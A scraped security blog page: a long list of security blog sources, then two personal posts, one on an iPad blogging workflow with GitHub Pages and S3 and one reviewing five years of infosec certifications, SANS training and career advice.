INCOG.HOST
incogni
InfinityCurve
infoblox
InfoGuard Labs
InQuest
Insomnia
Insurance Though Leadership
Intego
Integrity360
Intel 471
Intel Cocktail
IntelTechniques
Interlab
The Internet Obsrvatory
Interrupt Labs
InterSecLab
Intezer
inTheWild
Intrigus Security Lab
Intrinsec
intruder
invicti
Invictus IR
IOActive
IOActive Labs
I/Omergent
iosiro
IoT Inspector
ipapi.is
IPM Corporation
iQuasar Cyber
IronCore Labs
ironPeak
Irregular
isms.online
Isosceles
Isovalent
itres
iVerify
Jamf
JBCsec
JEB in Action
Jetstack
JFrog
jm33_ng
jswzl
JMP ESP
JMSWRNR
Jumpsec
Juniper
JupiterOne
K7 Security Labs
Kaibersec
Kali
Kandji
Karma-X
Kaspersky Daily
Keen Security Lab Blog
Keeper
KELA
KERBIT
Keysight
Kinney Group
Klogix
Kloudle
Knostic
Koi
koombea
KoreLogic Security
kosli
Kovrr
kpwn
Kraven Security
Kroll
kryptera.se
Kryptos Logic
KSOC
Ku Leuven | COSIC
Kudelski Security Research
Kyntra
Lab52
Lab539
Lacework
Lares
Lasso
Latacora
Latio Pulse
Lawfare
LayerX
LCI Security
Leak Signal
Legit Security
LetsDefend Blue Team Blog
LevelBlue
Leviathan Security Group
LEXFO
LIFARS
Lightspin
Lima Charlie
LMG Security
LMNTRIX
LogicalTrust
Logpoint
Longterm Security
Low Orbit Security
LunaSec
Lupovis
LureSec
Luta Security
lutra security
LVE Repository
Lyrebirds
macrosec
Magic Lasso
Magnet Forensics
Magonia Research
maikroservice
Malcat
Malcrove
Maltego
Malware Tips
Malwarebytes Labs
Malwology
Mand Consulting Group
Mandiant
Manifold
MANRS
Mantodea
Mantra
Margin Research
Marisec Intelligence
Martian Defense Cybersecurity
Material
Mattermost
matrix
McAfee
MDSec
mediaservice.net
Medigate
Mend.io
Menlo Security
Mercari Engineering
Meta Red Team X
Metabase
MetaCTF blog
MetalBear
Metlo
Microsoft Security
Midnight Blue
Miggo
Mimecast
Minded Security
Minerva
Mint Secure
Mithril Security
Mitiga
MixMode
mnemonic
Mobius Strip Reverse Engineering
ModernCISO
modzero
Mogwai Labs
MojoAuth
Mondoo
moonlock
Morphisec
Mossé Security
moz://a Hacks
Mozilla
MRG Effitas
Mullvad
MultiLogin
MySudo
N45HT
National Cyber Security Centre
The NATSPECS Blog | IST Institute for Security + Technology
nccgroup
Neodyme
NETBYTESEC
NetEnrich
The Netflix Tech Blog
Netlab
Netragard
NETRESEC
NETSCOUT & ASERT
NetSec Focus
Netsparker
NETSPI
Nettitude Labs
NeuralTrust
Network Intelligence
NextLabs
Nextron Systems
Nightfall
NinjaLab
NinTechNet
Nitrokey
NLab Security
NLnet Labs
noc.org
Noma
noname
Noq
Northwave
Not a Monad Tutorial
NowSecure
Nozomi Networks
NSFOCUS
Numberline Security
Numen Cyber Labs
Numorian
Nvidia
NXT1
Nzyme
Oasis Security
Objective-See
Obviate.io
OccamSec
Octagon Networks
OFFENSI
Offensity
Offensive Security
OKIOK
Okta Security
Oligo
Onapsis
ONEKEY
Open Raven
open-appsec by Check Point
Opera
Ophion Security
OPSECX
Optiv
Orange Cyberdefense
orca security
Öruggt Net
OSINT Jobs
The OSINTion Tidbit
Oso
OSR
OSTIF
Ostorlab
OtterSec
otto
Outcome Security
Outflank
Outpost24
Oversecured
Overt Operator
Oxeye
Oxford Academic | Cybersecurity
P0 Security
P1 Security
Palisade
Palo Alto
Panda
Pangu Lab
panoptica
panther
Paradigm
Paragon Initiative
Paralus
Paranoids Blog
Paraxial.io
Patchstack
Patrowl
Payatu
PeckShield
PentaGrid
Pentera
pentest information security assurance | Shearwater Group
PenTest Magazine
PenTestPartners
penthertz
Perception Point
Perfecto
perimeterx
Permasecure
Permiso
Permit.io
Persistent Security
Perspective Risk
PhishCloud
phishdeck
PhishLabs
Phobos
Phoenix R&D
Phorion
Phylum
Picus
Piiano
Pillar Security
PingSafe
PixiePoint Security
PIXM
Plerion
Plainbit
Platform Security
Plessas
PlexTrac
Plugin Vulnerabilities
Pluto
Polaryse
Polito Inc
Pomerium
Porchetta Industries
PortSwigger
Positive Security
Positron Security
Praetorian
The Prediction Blog
Prelude
Pretera
Prevailion
PrimeHarbor Technologies
PRIOn
privacybee
Privado
PRIZM Labs
Probely
Prodaft
ProDefense
Profero
Project Zero
ProjectDiscovery
Promon
PromptArmor
Proofnet
Proofpoint
Prophet
Prossimo
Protect AI
Protective Security
Protexity
PT SWARM
Pulse Security
Punk Security
Push
PVS-Studio
pwc
PwnDefend
Qrator Labs
Quadrant
Qualys
Qualys Threat Protection
Quarkslab
Quesma
r-tec
r2c
Radare team
Radix Security
raelize
Randori
RandoriSec
Rapid7 & AttackerKB
RapidFort
rashahacks
Raven Digital Security
raxis
RE:HACK
readibots
ReasonLabs
Reco
Recon Infosec
Red Asgard
Red Balloon Security
Red Canary
Red Maple Technologies
Red Rays
Red Threat
redacted
RedCode
RedForce
RedHunt Labs
RedOps
RedSiege
ReliaQuest
Relyze
Resecurity
Resoto
Restore Privacy
retooling
rev.ng
ReversingLabs
ReversingLabs | Secure.Software
ReynardSec
Rezilion
Rezonate
Rhino Security Labs
Ricterz and this
risk3sixty
RiskInsight
RiskIQ
River Loop Security
River Security
Rosenpass
RSA
runZero
S2
SAFE
Safeguard Cyber
Saferwall
SafetyDetectives
Salem
Salesforce Security Blog
Salt Security blog
Sandfly Security
sandworm
SANS
SANS Internet Storm Center
Sansec
Santander Security Research
Sayfer
SCADAhacker.com
Scam Sniffer
SCIP
scope
Scorpiones
scribe
ScriptJunkie
Scythe
sdmsoftware
Searchlight Cyber
Secfault Security
seclarityIO
The seclify blog
SEC Consult
SecAlerts
SecCore
SECFORCE
Secmatics
Secplicity
SecPod
Secret Double Octopus
Sector7
SecTrio
Secudea
Secura
Secure Annex
Secure Programmable Routes
Secure SaaS
SecureAuth
SecureCoding
SecureIdeas
SecureLayer7
Secureworks
Securify
Securify (inc)
SECUINFRA
Securing.pl
securit.ie
securitum
Security Blue Team
Security Connections
Security Dimension
Security for Everyone
Security Joes
Security Onion
Security Research Labs
Security Sting
Security-in-bits
SecurityIntelligence
Securitypage.fyi
SecurityRisk Advisors
SecurityScorecard
SecurityTrails
SecurityTrooper
Securosis
Secutils.dev
SEED Labs
Seekurity
Sekoia.io
Sekurenet
SELinux Userland
Semgrep
Semperis
SentinelOne
Sentor
Sentra
SEQ
Sevagas
SEVN-X
ShadowServer
SharkStriker
Shazzer
shelltrail
Shielder
ShiftLeft
Shindan
Shisho Cloud
Shockwave
Shodan Blog
Shostack & Associates
Shreshta
Sick.Codes
Sicuranext
Sidechannel
SIDN Labs
Sightline Security
Sigma Star
Signal
Signal Labs
SignalBlur
SignalsCorps
Silent Push
Simpity
Skylight Cyber
SkypLabs
Slayer Labs
SnapAttack
Snapsec
Snoopgod
Snyk
SOCPRIME
SOCRadar
Solar
SolidityScan
Somerset Recon
Sonarsource
Sonatype
SOOS
SORS
South Lake Cyber Risk
SpatialSec
SpecOps
SpecterOps
Spectral
Spiderfoot
SpiderLabs
spiderSilk
Splunk
Spur
ssd-disclosure
SSE
sshell
Stairwell
Stamus Networks
Stanford Internet Observatory
Star Labs
StationX
Steele Fortress
Stellar Cyber
Sternum
Stratascale
Stratosphere Lab
Strike
Summit Route
Svix
Sweepatic
Sweet
Swing’Blog
Swissky’s adventures into InfoSec World
SwordBytes
Sygnia
Symantec Enterprise Blogs
Synack
SYNACKTIV
SYNDIS
Synopsys
SynSaber
Syntax Bearror
Sysdig
SYSDREAM
Talos
Tanto
Target tech blog
Tarlogic
TCM Security
Team Cymru
Telekom Security
Teleport
Tenable
Tencent Security
TestifySec
Tetrane
Tetrel
Tevora
TFP0 Labs
The Sequence
Theori
THEXERO
Thinkst
Threat Fabric
ThreatConnect
ThreatDown
ThreatHunter
ThreatMon
ThreatNix
ThreatRay
ThreatSTOP
Tidal Cyber
Tidelift
tier zero zecurity
TikTok for developers
TLPBLACK
Token
totum
Tracebit
trainsec
Treblle
Trellix
Tremolo Security
Trenchant
TRENDMicro
Trickest
TridentStack
Trimarc
Tripwire
True Positives
TrueSec
Truffle Security
Trunc
Trustlook
Trustwave
TU/e
TurtleSec
Twosense
Ultimate IT Security
UpGuard
Uptycs
Upwind
UnderDefense
Unicorn Security
UNPACME
Untrusted Network
usd HeroLab
Vaadata
Valence
Valentin Lobstein
Validin
vansec
Varonis
VDA Labs
Vectra
Ventral Digital
Veracode
Veria Labs
Verichains
Versprite
Vertex
VetSec
vicarius
Videah
Viettel Security
Virtual Cybersecurity Consultant
Virtual Routes
VirusTotal
Volkis
Vonahi
VMRay
VNG Security Response Center
VoidStar
Volatility Labs
Volexity
vpnMentor
vSecureLabs
vu.ls
Vullify
VulnCheck
Vulnerable U
Vulners Blog
Wall of Sheep
Warrant
Washington Center for Cybersecurity Research & Development
watchTowr Labs
Websec
webz.io
welivesecurity by eset
WeSecureApp
White Intel
White Knight Labs
White Oak Security
WhiteSource
Wildfire Labs
WIMsecurity
Winsider
WisdomFreak
WithSecure
Wiz
Wordfence
X41 D-Sec
XBOW
XLab
XM CYBER
Xposed or Not
Yarix
Yes We Hack
Yongheng Chen (Ne0)
Yazoul
yubico
The Zap Blog
ZDResearch
ZecOps
Zeek
Zenity Labs
Zero Day Initiative
ZeroPath
Zetier
Zeus wpi
ZeusCloud
Zigrin Security
Zimperium’s Mobile Security Blog
Zod Magus
Zolder
zscaler
ZX Security

Writeup Blogs

Aggro Sites

Advisories

OSCP Tips

Thu, 14 Jan 2021 09:50:00 -0500

The Shellsharks Blog and my iPad Blogging Workflow

Mon, 19 Oct 2020 10:50:00 -0400

Shellsharks is a simple hobby project of mine. I primarily write about things that I may want as a reference for myself later but also as a place to share with others or simply to shout into the void. I think having a website or blog is a good way to keep record of things you have learned or to cement-in-time the way you feel about things. In my article on getting into the field of information security I mention the benefits of having a blog with respect to standing out as a job applicant. Perhaps one day shellsharks.com could morph into something more but for now, it is of simple intention and therefore requires simplicity with respect to contributing, maintaining, hosting etc…

I’m not a professional, or even particularly seasoned “blogger”. Shellsharks isn’t even my first attempt at a blog. What I can say from previous attempts to create as well as current efforts maintaining a blog, is that it is easier said than done. You need to think of things to write about, maybe even coming up with a “theme” or content-niche for your site. You need to decide on a hosting provider. You may want/need to do some level of web design. There’s SEO stuff to consider. You need to figure out your blogging toolset (e.g. writing apps, image hosting, etc…). All of this in aggregate can be intimidating (and it was!) at first blush, so many may find they just don’t have enough momentum to really get all of it up and running. This is why a site like Medium may be attractive to some as it takes out some of this initial set-up. You just create an account and start writing. I actually tried Medium but found that I wanted my own piece of digital turf. Enter shellsharks…

Hosting

Let’s start with hosting. I wanted something as simple as possible. Ideally, I could just take plain Markdown files, put them somewhere and presto! Blog post ready. This is effectively what I was able to achieve with GitHub pages from GitHub. With GitHub pages, you can get up and running relatively quickly. GitHub pages leverages Jekyll, a simple, static-page, blog-aware, ruby-based, site generator. Jekyll is easy enough to get started with but takes a little digging to master in my opinion. Using my pre-existing Shellsharks GitHub account (you can create an account here), I created a separate repository for the blog and I was off and running. I found the following theme, e.g. “Agus Makmun”, copied it over to my repo and then started making the necessary changes to get ready for my first blog post. I liked this theme because it was simple, clean and had a decent little search widget. There are plenty of other theme options though if you search around for them. Check out this great guide for more specifics in getting started with GitHub pages.

Equipment and Tooling

Alright! So I have my hosting platform and the base part of my site ready to go, all I really need now is to start pushing some content to my github repo and have Jekyll do the work with publishing. I wanted to have a very portable writing setup which meant being able to write and edit content as well as maintain my blog, all from an iPad. I have a first-gen, 11-inch, iPad Pro which works pretty well but I think having the larger 12.9 inch iPad would work better (for those who are interested in replicating my setup). The 11-inch iPad is a little cramped when using two apps side-by-side in the split-view mode which I do often because I am often writing in one window and using a browser or notes app in the second window. Paired with this iPad I have the Smart Keyboard Folio.

On my iPad I need a couple of different tools to do all my blogging “stuff”…

A markdown-compatible, Dropbox-enabled text-editor with iOS external file provider support.
A git client which can authenticate-to and work with my GitHub repositories.
A way to publish and get-links-to images hosted in AWS (in an S3 bucket).

For my text-editor, I settled on 1Writer (1Writer download here). As mentioned earlier, the text-editor I chose needed to have a few different things. Since I want to write primarily in Markdown, it obviously needed to support Markdown editing. I store my draft articles in Dropbox so preferably it could connect to Dropbox so that I can easily edit draft-posts. Finally, since the git-client I chose (described in the next paragraph) exposes its files via an iOS external file provider, the text-editor needed to support connecting to iOS external file providers. This way, I could easily edit live-posts as well as move draft posts into the file provider for subsequent committing.

Working Copy (Working Copy download here) is an awesome, super-powerful git-client that works well with native iOS. It allows you to fully sync any github repo and even exposes the repos via the iOS external file provider internal API which allows other apps to edit local files in these repos.

Sites leveraging GitHub pages have usage limits, notably that they cannot be larger than 1 GB. Static sites with mostly text files are typically pretty small but if you include a lot of media (namely, images) in your articles, you may find that you bump up against this 1 GB limit rather quickly. For this reason, I needed an external image-hosting solution. For this I settled on AWS - putting images in an S3 bucket and making these image objects public. So I needed an easy way to push images to my S3 bucket and subsequently get the unique image url for referencing in my blog post. Oddly enough, there is not that many iOS apps (that I could find) which can authenticate to an AWS account and work with file objects in S3 buckets. FileBrowser Biz however is a “pro” app I found which has this functionality (as well as a TON of other file-related functionality).

The FileBrowser Biz app allows me to create folders and easily upload files to S3 but does not actually expose the link to the file. To get this link, I created an Apple Shortcuts script, chained together with a Python script (executed using the excellent Pythonista iOS app) to pull down the URL of any S3 object. The Python script leverages the boto3 AWS SDK for Python. You can get the shortcuts script here and the Python script via my GitHub.

Workflow

Ok so now that I’ve walked you through the tooling and equipment I use, let’s go over the actual workflow. It’s actually pretty simple from here…

As I think of ideas, I open 1Writer and add-notes-to or create a new draft post within Dropbox. I’ve connected Dropbox to my 1Writer app so I can easily edit and create files in Dropbox directly from the app.
When I’m ready to start writing the post “for real”, I clone a draft template within 1Writer and put all content in this new Markdown file.

I’ll typically have Safari open in the split-view pane so that I can quickly do research, reference another article or get a link to another page.

For any images I want to have in my post, I’ll upload them via the FileBrowser Biz app then use my Shortcuts+Python scripts to get the unique S3 object link. I can reference these directly in my post via Markdown.

Once I’m ready to publish the article, I’ll switch to the Working Copy app and commit/push the new file or changes to a file. I then give GitHub pages+Jekyll a minute or so to do its magic and Presto! The post is published.

Pretty simple right?! This makes working on and actually publishing content as frictionless as possible for me which is essential to me actually doing it. Maybe it will even inspire you to start your own blog! Feel free to reach out if you have any questions on getting started or how I might be doing something with respect to Shellsharks.

A 5 Year Infosec Education Retrospective

Fri, 16 Oct 2020 10:50:00 -0400

A look back at 5+ years of infosec training, certifications and completing an entire masters program.

Jump to Section

My Education Journey
Assorted Advice
What Certification Should You Take?
Thoughts on SANS Trainings and GIAC Exams
Certification / Training Mini-Reviews
Johns Hopkins Cybersecurity Masters Review

Intro

Cybersecurity (a.k.a. Information Security or “infosec”) is an extremely fast-moving, technical field and one that for many, demands near-constant learning. This makes working in the Cybersecurity field both exciting and exhausting. Well above average salaries and an over-abundance of available jobs are just two of the compelling reasons to consider becoming an information security professional. Given the business-critical nature of a security professionals job, these individuals are expected to be highly trained, which (in my experience) typically means certifications, formal training courses and higher education.

Infosec is in a bit of a golden age with respect to the incredible amount of trainings, educational programs and online resources which are available, both free and paid, many of which also come with a certification you can sit for. These resources cover a vast array of information security disciplines (e.g. network security, penetration testing, incident response, compliance, etc…), so it can often be overwhelming for both newcomers and veterans to determine where to focus their time, effort and money with respect to getting the best education. To illustrate this point, hop into r/netsecstudents and it won’t take you long to find post after post asking the same general question - “What certificate/training should I take.” It’s a valid question and one that I’ve asked myself numerous times over the years. Whether we’re trying to improve our resume or gain some new technical capabilities, this question often remains the same.

Over the past five years I’ve been fortunate to have been provided a near-unlimited training budget and have been even more fortunate to have been given the time (both by my company and my family) to pursue these academic and learning interests. In this time I was able to achieve/complete a plethora of certifications and training classes as well as start and finish a Masters degree. Having recently completed the degree program as well as having achieved the relatively challenging GIAC GXPN certification, I wanted to take a look back at the last couple years and answer a few questions… Would I do anything differently? What have I learned? Will these achievements actually benefit me professionally? What certifications we’re useful? I hope that my somewhat unique perspective can help provide guidance to those asking the question, “What certificate/training should I take?”.

My Education Journey

I originally set out to become a developer, attending a four-year university as a computer science major. By the end of my 5 year college run I had switched majors three times, transferred schools and come away not with a CS degree, but with a degree in information security. Degree in hand, I began my search for an entry-level security position but soon found out that the degree alone was not a compelling enough argument. Companies were looking for individuals with experience, even for entry-level positions - something I just didn’t have. For me, certifications provided a means in which to qualify for positions in the absence of having this experience. Back then, and continuing to this day, a certification (more so than even my 4 year degree!) was enough to put a candidate (like myself) over that lack-of-experience obstacle and in front of some hiring managers. In those early days, I self-paid-for and acquired both the Security+ and the CEH certifications, both of which directly helped land me positions.

Studying for certifications and attending training requires motivation and an aptitude for the technical intricacies of the field - neither of these are out of reach for most. I certainly had a hunger to learn and the educational background/aptitude to succeed. Given the immediate success of landing positions shortly after having achieved previous certifications, my aim was to seek out other certification opportunities. Unfortunately, certification exams and training courses also (generally) require a good bit of cash. This put many certifications either completely out of reach for me or far enough away that I wasn’t sure the ROI was truly there for me to drop my own money on them. During this time, I bounced around several contract gigs, picking up an assortment of experience, always hoping to land at a company that might be willing to invest in me by way of paying for some trainings/certs.

After a few years I landed at what is my current place of employment and I finally got my wish - a company able and willing to invest in me. So I took full advantage of it. 16+ certifications and countless trainings… when I wasn’t busy with my day job, I was busy with training. Many days, my day job was training. I went from one training to the next, one cert to the next, at such a quick pace, I hardly even had time to actually come back, settle in and practice what I had learned. In hindsight, it’s easy to see that I became somewhat addicted to the process. Earlier struggles both finding work in the field and funding a cyber security education gave rise to an insatiable need to learn as much as possible and in parallel, get as many certifications and take as many trainings as possible. Now after these past 5 years, I have plenty of letters, plenty of new skills and some wisdom to share…

Quick Q&A

Would I have done anything differently? If I could do it all over again, I would take much more time after each training/certification to really apply newly acquired skills, seeking to truly and permanently absorb what I had learned. I also would have spent more time trying to figure out specifically what area of security I wanted to specialize in, which would have allowed me to carefully craft a tailored training regimen better suited to helping me achieve a more targeted expertise.
So what have I learned? It’s a strange dichotomy, through the course of taking rapid-fire, high-intensity trainings, I was able to learn A LOT of different things very quickly. A side-effect of this however was me forgetting much more than I wanted of what I had learned! Had I been more committed to letting this information soak in through practice and individual research, I may have developed a more robust expertise across these subjects. With this said, I did learn (and absorb) quite a bit. My main areas of focus were penetration testing, vulnerability research, reverse engineering and what I’ll call “general security”. To me, general security is a combination of a number of foundational security-relevant disciplines including networking (TCP/IP), web applications, operating systems, etc… Between all of the different trainings and courses, I found there was considerable content overlap. I think where I am strongest technically is in these areas of significant overlap. Learning the same thing multiple times (unsurprisingly!) has the effect of really drilling it into the brain.
Will these achievements actually benefit me professionally? This I can’t answer… yet. Since I haven’t looked for a new job in the last five years, I haven’t seen what, if anything, my bundle of certs plus Masters degree would be able to do for me out in the job market. More specifically, I’m unsure if these accolades would be beneficial in helping me get to my next step, whatever that might be. What I can say is that with each new certification, there is a potential new door that could open (for jobs looking for that specific certification). Though there is certainly diminishing returns with each new cert on a single resume, I have found that recruiters and hiring managers are typically impressed when you have a multitude of them to showcase. I have definitely received many emails from recruiters saying they are very impressed with my certifications and overall experience. So time will tell if they will actually make a difference in any future job searches! At least I can take comfort in knowing my resume will match plenty of certification-related, resume-sourcing keyword searches.
What certifications have proved useful? I’ll answer this in more detail in the Certification and Training Mini-Reviews.
What certification/training should I take? I’ll get into this in more detail in the section What certification/training should I take?

Advicestream

Here is my non-contiguous, random collection of certification/training-related advice/musings…

Studying for / taking certification exams and taking training courses requires time, money and effort/motivation. Keep this in mind when approaching any potential cert/training. Make sure you have all three in place before committing to any course/certification.
It’s hard to put a price tag on that first cert. For those who are having trouble breaking into the field, a certification may be what tips the scale in your favor. In this case, even an expensive cert (for example, a SANS certification) could in-fact pay off quickly if it helps you land that relatively high-paying junior infosec engineer role. Given the high demand for qualified individuals, even entry-level positions can command impressive salaries. With respect to certifications specifically, my recommendation for those looking for that breakout role is to research positions that are of interest to you, see what certifications they are expecting (or mandating) that you have, and then figure out how to get it.
Focus on the journey. A certification is nothing more than a piece of paper or a couple of letters behind your name. What matters most is the skills and knowledge you gain while prepping/training for that cert. Take your time to truly understand the material, acquire a solid foundation of knowledge, one that you can build on top of as you become more advanced. Focusing on simply passing a test rather than just understanding the material will hurt you in the long run.
…on the thread of “understanding the material”, I have a note for those fortunate enough to take a SANS exam (or similarly “open book” exam): A common recommendation for SANS exams (even from SANS themselves) is to create an index. I don’t recommend this. Now i understand people have different test-taking strategies and some people are just innately better at “taking tests” than others, but I think indexing encourages not really understanding the material, but rather, promotes just searching for the answer come test time. Yes, this may make getting the cert easier, and if that is your goal then so be it! But I urge those who are also interested in retaining the material to not create an index, and in that way, when studying, they aim for a better, more robust understanding. With this said, my personal strategy (I’ve never created an “index”), is to use the little sticky post-its that SANS provides to mark the different chapters/sections of the book (as well as any other potentially information-dense areas of the books). In this way, you can still quickly flip to a section of the course material during the test (or when studying!) to help with recalling certain information.
It’s worth reiterating here, albeit in a different way, take your time. Focus on the material, attempt to gain true comprehension and don’t seek to just memorize certain data points needed to pass the test. Pay very close attention to the boring stuff. Infosec is a broad field with many disciplines but the core concepts of security, networking, computing, etc…. are shared amongst all of these. This means having a very thorough understanding of the basics will help you excel in all areas of security, from compliance to penetration testing.
Government contract roles (which may be more numerous in certain locales) often look for specific certifications. Obtaining one of these certs is an easy way to immediately qualify for these positions.
Don’t depend too much on certifications. Yes, a certification may be able to help you qualify for a job or get your foot in the door for an interview but often it only goes that far. Your peers will likely not think more of you, your boss will likely not promote you, the work itself will not become easier all by merely getting a certification. Focus on what you can learn, the cert is just a bonus.
Experience has been and will remain king with respect to “proving” your abilities to a prospective employer. Certifications however, can certainly help a candidate get a foot in the door for an interview or even uniquely qualify them for a role that may explicitly require a specific certification.
Certs, trainings, degrees… ultimately, they serve one of two distinct purposes (in my opinion). Bolstering a resume and acquiring knowledge/increasing skills. Remember this when thinking about what you want to pursue next!
Find a way to expand on what you learned during the course of studying for a certification or attending a training by doing your own independent research. At the point where you feel you really understand the material, you can then run off and sign up for the next thing.

What Certification or Training Should I Take?

Ok, so let’s try to answer this primary question. Let’s approach the answer based on where someone might be in their career or job search. Choose the scenario below which best describes your current standing…

You’re new to Information Security and are looking to get a job: Do some research on what certifications (if any) the jobs you’d be interested in are asking for. (Try popular job search websites like Monster, Linkedin and Indeed, to name a few). Where you find some certification requirement commonality amongst these job reqs, take a look at how you can get that specific cert. If the training, or exam voucher is expensive, take a look at what salary you may expect provided you get the job and calculate your return on investment. You may find that investing in yourself by paying for the cert can pay off in a big way. This methodology is more relevant for junior positions as the certification can stand in place of the lack of professional experience as it did for me in my early professional career.
You are currently in a junior role and are looking to advance: I’d recommend a similar approach as above, with the tweak that you will likely be targeting a more advanced certification. Keep in mind though that at this point, unless the job you are looking at is contractually-obligated to supply personnel with certain certifications, it is less likely that a certificate is really what you need to get into your next role. Rather, focus more on the experience that is being asked for on the job req you are interested in. If getting a certification can help you obtain that specific experience, then great! Two birds with one stone.
You are a mid-level or senior security professional and are looking to add valuable skills to your resume: Focus on practical certifications and training that can get you to “expert” level within a specific knowledge area you may already have some expertise in or that can fill an important gap in your overall knowledge. Keep in mind, there’s plenty of free and paid training out there to help you get there, so don’t immediately default to trying to pay for some expensive certification or training. Do some research and then get learning! Some “domains” to keep in mind would be web applications, programming/development, cloud, networking, and incident response. I think focusing more on experience you need rather than some certification is more appropriate in this scenario.
You’re interested in getting into penetration testing: Information security as a profession is made up of a lot of unique sub-disciplines. Penetration testing (a.k.a. “Pentesting”) happens to be one of the more popular aspirations for those entering the field, even though penetration testers as a whole make up only a small fraction of the infosec community. For those interested in infosec, don’t immediately think that pentesting is what is right for you or that it’s the only interesting option. Take your time to research everything else you can do in infosec before committing to the pentest path. However, for those that are truly interested, I highly recommend taking a look at the PWK/OSCP from Offensive Security and/or the PTP from eLearnSecurity. Both are practical, lab-based, hands-on certifications with a LOT of good training material. Once completing either of those, I’d recommend checking out the other, more advanced trainings/certs offered by both Offensive Security and eLearnSecurity. For more info, please check out my reviews for both the PWK/OSCP and PTP courses.
You aren’t sure what security discipline are you interested in yet: I’d reference my initial advice here. If you want a job in infosec go take a look at what certs are being asked for within the job reqs you are interested in. Otherwise, I probably wouldn’t throw money at a random cert (yet!). I also have a guide for those interested in getting into the field! If you aren’t sure exactly where you want to go, then don’t sweat it! Get a job anywhere in the infosec field (where you can), and try it out. Maybe you get a SIOC position or a compliance position and do that for a few months. If it’s interesting, pursue it further, if not, pivot somewhere else in the field. A lot of what you’ll learn in one infosec sub-discipline transfers very nicely to any other role in infosec. Finally, feel free to check out my series of mini-reviews covering a large assortment of popular certification/trainings I have personally taken.
None of these apply and you’re just interested in taking something new: If none of the scenarios really apply to you then maybe peruse my series of certification/training mini-reviews, take a look at the vast collection of online education resources or even reach out to me for more personalized recommendations!

Thoughts on SANS Training and GIAC Certification Exams

Given the overwhelming popularity and industry mind-share that this organization, as a security training provider has, coupled with the breadth/depth of experience I have taking their classes and acquiring their certifications, I wanted to take some time to share my perspective on SANS.

I’ll start by saying I have mixed feelings overall on SANS. I think their course material is top-notch, their instructors are world-class, industry-leaders and their network and reach (in terms of how well-known they are) is basically unrivaled. But… they are simply too expensive of an option for most individuals paying out-of-pocket. Secondly, I believe that a sizable majority of the material provided in any given SANS training course is accessible (in some way) online, for free. You need only an Internet connection and the desire to do some research yourself to find it. If not immediately available online you can often find the material in a book or blog post or even a github repo likely also written by the author themselves! So what you are paying for isn’t necessarily the material (which again, is likely available open-source), rather you pay for by signing up for a SANS course is the convenience and the delivery format. From how I see things, the ingredients are all readily available. I compare SANS to going to a fancy restaurant and having a world-class chef prepare a meal for you - one you could have made with those same ingredients at home. With some practice, and most if not all of the same ingredients at your disposal, you too can feed your mind the same dish.

Before I get into exactly how I would recommend you go about giving yourself a SANS education without ever attending a SANS course, let me qualify what I said above with two important points…

First, if you get the chance to attend a SANS course, paid-for by your employer, absolutely take them up on this offer. Though I do think in many cases you can replicate SANS course content with free or cheap resources online, actually attending a SANS course is an amazing opportunity and can provide the following…

Learn the material in a quicker, more direct fashion.
Get immediate help on advanced topics from an industry expert. This can help you get over learning roadblocks faster than you may have otherwise been able to on your own.
Network with like-minded individuals in your field as well as expert instructors.
Obtain a certification that is highly regarded in the field and could help you with future job searches.

Second, though it is becoming harder to recommend due to increasing cost (now $2500, where as only a year or two ago it was closer to $1000), participating in a SANS work study can give someone an avenue to attending a SANS training for much cheaper than the normal price (which is over $7000 and can even exceed $8000 after bundling the certification, on-demand materials, etc…). I’ve facilitated on 4 separate occasions and can tell you that overall, it’s a pretty easy gig! You’re asked to assist with conference setup/teardown as well as some light operational tasking throughout each day (mainly fetching stuff for the instructor if needed and collecting the notorious daily SANS surveys). I think even at the new price, it is still (albeit barely) a decent value, especially for those who are maybe looking for that first cert. As a “first cert” possibility, I think SANS is one of the best options for a candidate to make themselves stand out with respect to getting an entry-level position.

Ok, so let’s say your employer won’t shell out the cash for a SANS training and you can’t either (nor have you had success getting into the work study). How can you give yourself a SANS-equivalent education yourself? Here’s what I would do…

First, figure out what you’re interested in via their Cyber Security Skills Roadmap. Figure out where you are technically or where you’d like to be and pick out the certification that is next in your path. Next, find the “Course Syllabus” for the chosen course, for example, SEC560: Network Penetration Testing and Ethical Hacking. On this page, you can scroll down to the “Syllabus” section and see a relatively in-depth description of the topics covered during each day of the training for that course. Using this syllabus, you can build your own self-paced, self-taught curriculum, for free (or at-least on the cheap), online! Just google each topic and hunt for trainings/free content online related to that topic. I promise there is much more than you might think and you can find quite a bit of success with this method. This will require some determination, and is certainly more of a “Try Harder” (more on this in a bit) approach, but where money is short, I believe you can make up for it in this way. If you’re having trouble finding resources online, check out my list of education resources!

Certification and Training Mini-Reviews

Having taken and completed each of the trainings/certifications below, I wanted to provide a quick “review” of what I thought of each course. The reviews aren’t meant to summarize what is covered in these courses but rather give my thoughts on the value of each as well as recommendations or advice for those potentially interested in taking them. These are point-in-time assessments and as such can not reflect any updates to the material since the time I took it.

Mini-Reviews Table of Contents

Tenable Certified Security Engineer (TCSE), Tenable
Core Impact Certified Professional (CICP), Core Security
SEC560: Network Penetration Testing and Ethical Hacking (GPEN), SANS
Certified Information System Security Professional (CISSP), ISC2
Penetration Testing Student (eJPT), eLearnSecurity
Penetration Testing Professional (eCPPT), eLearnSecurity
SEC503: Intrusion Detection In-Depth (GCIA), SANS
SEC573: Automating Information Security with Python (GPYC), SANS
SEC575: Mobile Device Security and Ethical Hacking (GMOB), SANS
Offensive Security Certified Professional (OSCP)
SEC504: Hacker Tools, Techniques, Exploits and Incident Handling (GCIH), SANS
SEC401: Security Essentials (GSEC), SANS
SEC542: Web App Penetration Testing and Ethical Hacking (GWAPT), SANS
FOR610: Reverse-Engineering Malware (GREM), SANS
ICS515: ICS Active Defense and Incident Response (GRID), SANS
SEC660: Advanced Penetration Testing, Exploit Writing and Ethical Hacking (GXPN), SANS
SEC617: Wireless Penetration Testing and Ethical Hacking (GAWN), SANS
AWS Certified Solutions Architect Associate
AWS Certified Security Specialty
SEC588: Cloud Penetration Testing (GCPN), SANS
SEC537: Practical OSINT Analysis and Automation, SANS
SEC460: Enterprise and Cloud | Threat and Vulnerability Assessment (GEVA), SANS
SEC450: Blue Team Fundamentals: Security Operations and Analysis (GSOC), SANS
SEC487: Open-Source Intelligence (OSINT) Gathering and Analysis (GOSI), SANS
SEC522: Application Security: Securing Web Apps, APIs, and Microservices (GWEB), SANS
MGT512: Security Leadership Essentials for Managers (GSLC), SANS
Windows Malware and Memory Forensics, Volatility
The Shellcode Lab
SANS SEC564 Red Team Operations and Threat Emulation
SANS SEC642 Advanced Web App Penetration Testing
SpecterOps Adversary Tactics: Red Team Operations
